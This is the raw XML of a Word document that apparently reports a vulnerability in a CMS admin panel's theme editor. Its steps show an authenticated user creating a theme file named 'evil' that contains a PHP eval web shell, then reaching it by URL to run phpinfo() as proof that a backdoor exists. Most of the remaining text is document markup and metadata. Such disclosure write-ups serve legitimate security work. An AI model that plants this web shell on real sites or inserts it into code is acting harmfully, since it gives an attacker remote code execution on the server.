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Log in to the background management interface, click "Theme" to edit.</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="527177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Click "Create New Chunk" to create a new file. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="263207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Create a file named 'evil'. Fill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&lt;? php eval ($_ POST ['x']) ?&gt;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 the content section, and click "Save and Exit" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="24384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Log out first, then visit the website directory: / public/themes/default/evil.chunk.php, and use the get method to upload the php command:? x=phpinfo ().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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="1755140"/>
            <wp:effectExtent l="0" t="0" r="762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Found that the command was executed successfully, and the evil.chunk.php backdoor file was created successfully in the website directory.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244215"/>
            <wp:effectExtent l="0" t="0" r="571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8469D0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="628469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iYzRjZDg4ODIxMmZkMzVjYzYxNzIzMDEwYjJjY2IifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="0A9D7A08"/>
    <w:rsid w:val="12CB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</Words>
  <Characters>173</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>24</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>180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2024-05-26T08:15:00Z</dcterms:created>
  <dc:creator>OoLs</dc:creator>
  <cp:lastModifiedBy>OoLs、</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-26T09:14:52Z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7736254143B34434BAC35D3AD83DF086_12</vt:lpwstr>
  </property>
</Properties>
</file>